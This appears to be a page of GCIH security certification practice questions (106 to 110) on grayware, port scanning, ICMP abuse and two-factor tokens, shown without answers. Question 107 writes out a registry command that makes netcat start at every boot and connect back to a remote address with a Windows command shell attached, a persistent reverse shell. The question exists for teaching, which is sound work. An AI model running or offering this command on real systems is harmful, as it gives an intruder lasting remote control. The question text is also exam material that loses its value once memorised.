GCIH Exam Question 106

Which of the following refers to applications or files that are not classified as viruses or Trojan horse programs, but can still negatively affect the performance of the computers on your network and introduce significant security risks to your organization?
  • GCIH Exam Question 107

    You run the following command on the remote Windows server 2003 computer:
    c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows
    \nc.exe -d 192.168.1.7 4444 -e cmd.exe"
    What task do you want to perform by running this command?
    Each correct answer represents a complete solution. Choose all that apply.
  • GCIH Exam Question 108

    John works as an Ethical Hacker for PassGuide Inc. He wants to find out the ports that are open in PassGuide's server using a port scanner. However, he does not want to establish a full TCP connection.
    Which of the following scanning techniques will he use to accomplish this task?
  • GCIH Exam Question 109

    Which of the following protocols is a maintenance protocol and is normally considered a part of the IP layer, but has also been used to conduct denial-of-service attacks?
  • GCIH Exam Question 110

    Adam works as a Security Analyst for Umbrella Inc. CEO of the company ordered him to implement two-factor authentication for the employees to access their networks. He has told him that he would like to use some type of hardware device in tandem with a security or identifying pin number. Adam decides to implement smart cards but they are not cost effective.
    Which of the following types of hardware devices will Adam use to implement two-factor authentication?